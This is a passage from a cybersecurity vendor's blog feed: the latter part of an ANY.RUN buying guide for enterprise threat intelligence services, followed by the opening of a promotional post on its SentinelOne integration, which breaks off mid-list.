<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="474" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1024x474.png" alt="" class="wp-image-23155" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1024x474.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-300x139.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-768x356.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1536x711.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-2048x949.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-370x171.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-270x125.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-740x343.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN TI Feeds help detect and block emerging threats</em></figcaption></figure>



<h2 class="wp-block-heading">Evaluate Correlation, Not Just Individual Indicators </h2>



<p class="wp-block-paragraph">An indicator is often just the starting point of an investigation. Its real value increases when analysts can connect it to related infrastructure, files, malware, and other activity. </p>



<p class="wp-block-paragraph">Threat intelligence correlation helps uncover these relationships. For example, a suspicious domain may be linked to an IP address, URL, malicious file, or malware family, giving analysts a broader view of the threat rather than a single isolated data point. </p>



<p class="wp-block-paragraph">This goes beyond IOC management, which focuses on tracking, validating, and distributing indicators. For more complex investigations, analysts also need to understand how indicators are connected and what those relationships reveal about the activity behind them. </p>



<p class="wp-block-paragraph">When evaluating a solution, test common investigation scenarios and see how easily analysts can pivot between related intelligence. The goal is to determine whether the available context can reduce investigation time and manual research. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Strengthen your SOC with ANY.RUN.
</span> 
<br>
Investigate threats faster, turn analysis into actionable intelligence, and streamline your response.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=enterprise-threat-intelligence-guide&#038;utm_term=170926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Assess Integration Options </h2>



<p class="wp-block-paragraph">Threat intelligence should fit into the security workflows your organization already uses. </p>



<p class="wp-block-paragraph"><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">Enterprise</a> teams may need intelligence to move between SIEM, SOAR, EDR/XDR, firewalls, case-management systems, and other security tools. Integration should therefore be part of the procurement process, not an afterthought. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="539" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-1024x539.png" alt="" class="wp-image-23156" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-1024x539.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-768x405.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-1536x809.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-2048x1079.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-370x195.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise-740x390.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN solutions deliver measurable outcomes in threat detection and hunting</em></figcaption></figure>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> integrates with existing security environments through APIs, SDKs, and ready-made integrations, helping teams bring threat analysis and shared context into their established workflows. </p>



<p class="wp-block-paragraph">Beyond API availability, consider request limits, quotas, bulk operations, response times, authentication, SDK support, and automation capabilities, especially when handling thousands of enrichment requests daily. </p>



<p class="wp-block-paragraph"><a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">Explore all ANY.RUN integrations</a> </p>



<h2 class="wp-block-heading">Consider STIX/TAXII Support </h2>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/anyrun-sandbox-misp-integration/" target="_blank" rel="noreferrer noopener">STIX/TAXII support</a> can simplify the exchange of structured threat intelligence between security systems and reduce custom integration work. </p>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a> support STIX/TAXII alongside API and SDK integrations, making it easier to incorporate intelligence into existing workflows. </p>



<p class="wp-block-paragraph">During a proof of concept, test whether the data arrives in the expected format, includes the required context, updates at the right frequency, and works reliably with your existing systems. </p>



<h2 class="wp-block-heading">Plan for Scale From the Beginning </h2>



<p class="wp-block-paragraph">A service that works for a small security team may face different demands as usage expands. More analysts and automated enrichment can increase investigation volume and API requests, while MSSPs may need to support multiple customer environments at once. </p>



<p class="wp-block-paragraph">Consider user management, permissions, workspace separation, auditability, API capacity, and data volumes when assessing scalability. MSSPs should also look closely at <a href="https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/" target="_blank" rel="noreferrer noopener">multi-tenancy</a> to ensure customer data remains properly separated. </p>



<p class="wp-block-paragraph"><a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s MSSP</a> offering supports high-volume workflows with automation, standardized reporting, API/SDK access, and capabilities designed for multiple customer environments. Interactive Sandbox, TI Lookup, and TI Feeds deliver 3x better SOC performance. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="440" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-1024x440.png" alt="" class="wp-image-23158" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-1024x440.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-300x129.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-768x330.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-1536x660.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-2048x880.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-370x159.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-270x116.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/mssp-740x318.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Strengthen MSSP capabilities for better client results with ANY.RUN</em> </figcaption></figure>



<p class="wp-block-paragraph">Scalability also means keeping the service manageable as more teams, analysts, and customers rely on it. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut Tier 1 workload by up to 20%.
</span> 
<br>
Increase analyst capacity, streamline operations, and improve service performance.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=enterprise-threat-intelligence-guide&#038;utm_term=170926&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Boost MSSP efficiency</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Test the Analyst Experience </h2>



<p class="wp-block-paragraph">Threat intelligence should <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">help analysts investigate threats</a> efficiently. Even extensive intelligence can be difficult to use if analysts have to navigate multiple disconnected workflows. </p>



<p class="wp-block-paragraph">During evaluation, pay attention to search, filtering, historical visibility, pivoting, and how easily analysts can move between related indicators. </p>



<p class="wp-block-paragraph">A practical test is to give analysts a familiar investigation scenario involving a suspicious domain, IP, URL, or file hash. See how quickly they can determine its relevance, identify related activity, and gather enough context to decide what to investigate next. </p>



<p class="wp-block-paragraph"><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> can also support hands-on malware and phishing analysis, allowing analysts to interact with threats in live virtual environments and access findings such as IOCs and TTPs. For enterprise SOCs, 95% of SOC teams speed up threat investigations, while 94% of users achieve faster triage. </p>



<h2 class="wp-block-heading">Determine the Need for Dark Web Monitoring  </h2>



<p class="wp-block-paragraph">Dark web monitoring can help organizations identify leaked credentials, exposed corporate information, or brand-related threats. </p>



<p class="wp-block-paragraph">Rather than treating it as a must-have feature, assess whether it addresses a specific security requirement. Consider source coverage, validation, detection speed, and how easily analysts can act on the findings. </p>



<h2 class="wp-block-heading">Use Real Data in the Proof of Concept </h2>



<p class="wp-block-paragraph">A proof of concept should reflect <a href="https://any.run/cybersecurity-blog/soc-maturity-with-threat-intelligence/" target="_blank" rel="noreferrer noopener">real security workflows</a>, not just provider demonstrations. </p>



<p class="wp-block-paragraph">Use representative historical alerts, including malicious, benign, and ambiguous cases. Measure outcomes such as investigation time, enrichment quality, false-positive reduction, manual effort, search performance, and API reliability. </p>



<p class="wp-block-paragraph">If automated enrichment is planned, test realistic request volumes to identify potential limitations before deployment. </p>



<h2 class="wp-block-heading">Review the Total Cost of Ownership </h2>



<p class="wp-block-paragraph">The cost of a threat intelligence service extends beyond the subscription. Integration, maintenance, training, analyst time, infrastructure, and API usage can all add to the total. </p>



<p class="wp-block-paragraph">Review API limits and additional usage costs, and consider whether the service adds meaningful coverage or context to your existing intelligence sources. </p>



<p class="wp-block-paragraph">For example, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a> help identify up to 58% more threats overall and offer a 21-minute reduction in MTTR per case. When assessing ROI, teams can compare metrics such as these with their own baseline investigation time, detection coverage, and analyst workload. </p>



<h2 class="wp-block-heading">Turn Requirements Into a Practical Decision </h2>



<p class="wp-block-paragraph">Once requirements and testing are complete, assess how well each offering fits your security workflows. </p>



<p class="wp-block-paragraph">Consider intelligence quality, freshness, enrichment, correlation, integration, automation, privacy, scalability, usability, and cost. The priorities will vary by organization and use case. </p>



<p class="wp-block-paragraph">An <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSP</a> may focus more on multi-tenancy and API capacity, while an <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">enterprise</a> SOC may prioritize investigation speed and contextual enrichment. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="459" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-1024x459.jpeg" alt="" class="wp-image-23159" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-1024x459.jpeg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-300x134.jpeg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-768x344.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-1536x688.jpeg 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-2048x918.jpeg 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-370x166.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-270x121.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/enterprise1-1-740x332.jpeg 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN empowers businesses to detect, respond, and strategize more effectively</em></figcaption></figure>



<p class="wp-block-paragraph">A threat intelligence procurement guide should help teams base their decision on requirements, testing, and measurable operational outcomes. </p>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">Choosing an enterprise threat intelligence offering starts with understanding your security requirements and use cases. </p>



<p class="wp-block-paragraph">Assess intelligence quality, freshness, context, enrichment, integrations, privacy, scalability, and automation, then validate those criteria with real-world testing. </p>



<p class="wp-block-paragraph">The goal is to turn threat intelligence into useful context that helps security teams investigate threats faster and reduce unnecessary work. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence to more than 16,000 organizations and 700,000 security professionals worldwide. </p>



<p class="wp-block-paragraph">Using <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, it’s possible for SOC teams and MSSPs to analyze files, URLs, phishing, and malware in real time while monitoring processes, network activity, and other threat behavior. </p>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s Threat Intelligence</a> helps teams investigate indicators, uncover related infrastructure, enrich alerts, and bring fresh threat data into existing workflows. </p>



<p class="wp-block-paragraph">Dedicated <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">Enterprise</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSP</a> offerings provide capabilities for privacy, access control, collaboration, automation, and high-volume investigations. ANY.RUN is also SOC 2 Type II attested. </p>



<h2 class="wp-block-heading">FAQ </h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1789629806568"><strong class="schema-faq-question"><strong>1. What is enterprise threat intelligence?</strong> </strong> <p class="schema-faq-answer">Enterprise threat intelligence is information about cyber threats that helps organizations detect, investigate, and respond to security incidents. It can include data on malicious IPs, domains, URLs, files, malware, and threat activity. <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">ANY.RUN Enterprise</a> provides enterprise-focused threat analysis and intelligence capabilities and is used by 16,000 organizations across a range of industries. </p> </div> <div class="schema-faq-section" id="faq-question-1789629833453"><strong class="schema-faq-question">2. <strong>What are the main threat intelligence use cases?</strong> </strong> <p class="schema-faq-answer">Common threat intelligence use cases include alert enrichment, threat hunting, incident response, malware analysis, phishing detection, proactive monitoring, and IOC management. Interactive Sandbox can help analysts investigate suspicious files and URLs, extract IOCs and TTPs, and integrate findings with existing security tools. </p> </div> <div class="schema-faq-section" id="faq-question-1789629859703"><strong class="schema-faq-question"><strong>3. What are threat intelligence requirements?</strong> </strong> <p class="schema-faq-answer">Threat intelligence requirements define what a security team needs from an intelligence solution, including data quality, freshness, context, integrations, API capacity, automation, privacy, and scalability. For MSSPs, requirements may also include multi-tenant workflows and customer separation. <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">ANY.RUN for MSSPs</a> highlights API/SDK integration and reports that 1,700+ MSSPs use the platform. </p> </div> <div class="schema-faq-section" id="faq-question-1789629875253"><strong class="schema-faq-question"><strong>4. What is the threat intelligence lifecycle?</strong></strong> <p class="schema-faq-answer">The <a href="https://intelligence.any.run/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktothreatintelligence" target="_blank" rel="noreferrer noopener">threat intelligence</a> lifecycle typically includes planning, collection, processing, analysis, dissemination, and feedback. It helps organizations turn raw threat data into actionable intelligence. </p> </div> <div class="schema-faq-section" id="faq-question-1789629903453"><strong class="schema-faq-question"><strong>5. What is a threat intelligence maturity model?</strong> </strong> <p class="schema-faq-answer">A threat intelligence maturity model helps organizations assess and improve their intelligence capabilities, including data collection, analysis, automation, integration, and intelligence sharing. </p> </div> <div class="schema-faq-section" id="faq-question-1789629923736"><strong class="schema-faq-question"><strong>6. What are threat intelligence frameworks?</strong> </strong> <p class="schema-faq-answer">Threat intelligence frameworks provide structured approaches for collecting, analyzing, and sharing threat information. Common examples include MITRE ATT&amp;CK, STIX, and TAXII. <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> supports integrations with security platforms, while <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a> can deliver structured threat intelligence for security workflows. </p> </div> <div class="schema-faq-section" id="faq-question-1789629934219"><strong class="schema-faq-question"><strong>7. What are threat intelligence data sources?</strong> </strong> <p class="schema-faq-answer">Threat intelligence data sources can include internal security telemetry, malware analysis, open-source intelligence, security researchers, commercial providers, and information-sharing communities. <a href="https://any.xn--runs%20threat%20intelligence%20lookup-p64w/" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s TI Lookup</a> draws on research from 16K organizations and 700K analysts, providing data from sandbox investigations. </p> </div> <div class="schema-faq-section" id="faq-question-1789629953436"><strong class="schema-faq-question"><strong>8. What are threat intelligence feeds?</strong> </strong> <p class="schema-faq-answer">Threat intelligence feeds provide continuously updated threat data, such as malicious IPs, domains, URLs, and file hashes. When evaluating feeds, consider freshness, validation, context, and integration options. <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">ANY.RUN TI Feeds</a> provides feeds enriched with sandbox analysis; 99% of unique, high-confidence IOCs are added after validation. </p> </div> <div class="schema-faq-section" id="faq-question-1789629979369"><strong class="schema-faq-question"><strong>9. What is the difference between tactical, operational, and strategic threat intelligence?</strong> </strong> <p class="schema-faq-answer">Tactical threat intelligence focuses on technical indicators and adversary techniques. Operational intelligence provides context about campaigns and activity, while strategic intelligence addresses broader threats, trends, and risks. </p> </div> <div class="schema-faq-section" id="faq-question-1789629995303"><strong class="schema-faq-question"><strong>10. How should you evaluate an enterprise threat intelligence provider?</strong> </strong> <p class="schema-faq-answer">Evaluate intelligence quality, freshness, context, integrations, API capacity, privacy, scalability, automation, usability, and cost. Test shortlisted solutions with real security workflows during a proof of concept. </p> </div> <div class="schema-faq-section" id="faq-question-1789630020069"><strong class="schema-faq-question"><strong>11. How should you test a threat intelligence solution?</strong> </strong> <p class="schema-faq-answer">Use real or representative alerts and investigation scenarios. Measure enrichment quality, investigation time, manual effort, search performance, API reliability, and scalability. </p> </div> <div class="schema-faq-section" id="faq-question-1789630043352"><strong class="schema-faq-question"><strong>12. Why is context important in threat intelligence?</strong> </strong> <p class="schema-faq-answer">Context helps analysts understand whether an indicator is relevant by connecting it to related domains, IPs, files, malware, TTPs, and historical activity. </p> </div> </div>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/">Enterprise Threat Intelligence Buying Guide: How to Choose the Right Solution</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN &amp; SentinelOne: One Workspace, Instant Context for Rapid Response</title>
		<link>https://any.run/cybersecurity-blog/sentinelone-integration/</link>
					<comments>https://any.run/cybersecurity-blog/sentinelone-integration/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 16 Sep 2026 06:40:15 +0000</pubDate>
				<category><![CDATA[Integrations & connectors]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23116</guid>

					<description><![CDATA[<p>Speed and clarity are the ultimate advantages for modern SOC teams. The integration of ANY.RUN into SentinelOne delivers exactly that. Instant threat intelligence and interactive sandbox capabilities embedded right where your analysts already work. Let’s look at how this unified workflow eliminates context switching, accelerates incident response, and drives higher ROI by transforming alerts into [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/sentinelone-integration/">ANY.RUN &amp; SentinelOne: One Workspace, Instant Context for Rapid Response</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Speed and clarity are the ultimate advantages for modern SOC teams. The integration of <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> into <a href="https://www.sentinelone.com/" target="_blank" rel="noreferrer noopener"><strong>SentinelOne</strong></a> delivers exactly that. Instant threat intelligence and interactive sandbox capabilities embedded right where your analysts already work.</p>



<p class="wp-block-paragraph">Let’s look at how this unified workflow eliminates context switching, accelerates incident response, and drives higher ROI by transforming alerts into actionable insights without leaving the platform.</p>



<h2 class="wp-block-heading">About the ANY.RUN &amp; SentinelOne Integration </h2>



<p class="wp-block-paragraph">The integration between ANY.RUN and SentinelOne brings advanced malware analysis and global threat intelligence into the platform as native, actionable data.  </p>



<p class="wp-block-paragraph">Instead of manually exporting files or switching between multiple consoles, security teams can operationalize ANY.RUN’s capabilities within the SentinelOne ecosystem.  </p>



<p class="wp-block-paragraph"><strong>New Connectors for </strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a><strong> and </strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a><strong> (via Singularity Hyperautomation):</strong></p>



<ul class="wp-block-list">
<li><strong>Accelerate File/URL Triage with Automated Behavioral Analysis:</strong> Automatically submit suspicious files and URLs from alerts to the ANY.RUN sandbox. Behavioral verdicts and risk scores are delivered directly into SentinelOne, enabling evidence-based decisions.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Enrich Alert Investigations with Instant Context:</strong> Perform on-demand lookups for IOCs like hashes, IPs, and domains. This provides analysts with immediate data on industry targeting, malware families, and related infrastructure without leaving the alert interface.  </li>
</ul>



<p class="wp-block-paragraph"><strong>Existing Integration for </strong><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a><strong> (via the native TAXII Connect IOC Ingestion app on the SentinelOne Marketplace)</strong></p>



<ul class="wp-block-list">
<li><strong>Strengthen Proactive Defense with High-Fidelity Indicators:</strong> Stream verified malicious indicators (IPs, domains, URLs) directly into the platform via STIX/TAXII. This allows for automated correlation against endpoint logs and the generation of native alerts for matching threats.  </li>
</ul>



<p class="wp-block-paragraph">By turning malware analysis and threat enrichment into a native part of the investigation pipeline, ANY.RUN and SentinelOne empower SOC teams to stay ahead of evasive attacks while maximizing the value of their existing security stack.  </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Streamline triage and cut response time inside your SentinelOne environment.
</span> 
<br>
Slash MTTR. Eliminate console switching. Reduce exposure.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=sentinelone-integration&#038;utm_term=160926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading"> 1. ANY.RUN Interactive Sandbox: Improve Triage Speed and Detect Evasive Attacks </h2>



<p class="wp-block-paragraph">This integration component can be used via<a href="https://www.sentinelone.com/platform/singularity-hyperautomation/" target="_blank" rel="noreferrer noopener"> <strong>Singularity Hyperautomation</strong></a>, allowing for deep behavioral analysis of suspicious artifacts.  </p>



<p class="wp-block-paragraph">When SentinelOne triggers an alert, it<strong> automatically sends the file or URL to the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=sentinelone-integration&amp;utm_term=160926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN Sandbox</a> </strong>based on your pre-set preferences (like OS or analysis duration). Once the analysis is complete, behavioral verdicts (malicious, suspicious, or benign) are delivered directly into the <strong>Notes</strong> section of the specific SentinelOne alert.  </p>



<p class="wp-block-paragraph"><strong>Benefits:</strong>  </p>



<ul class="wp-block-list">
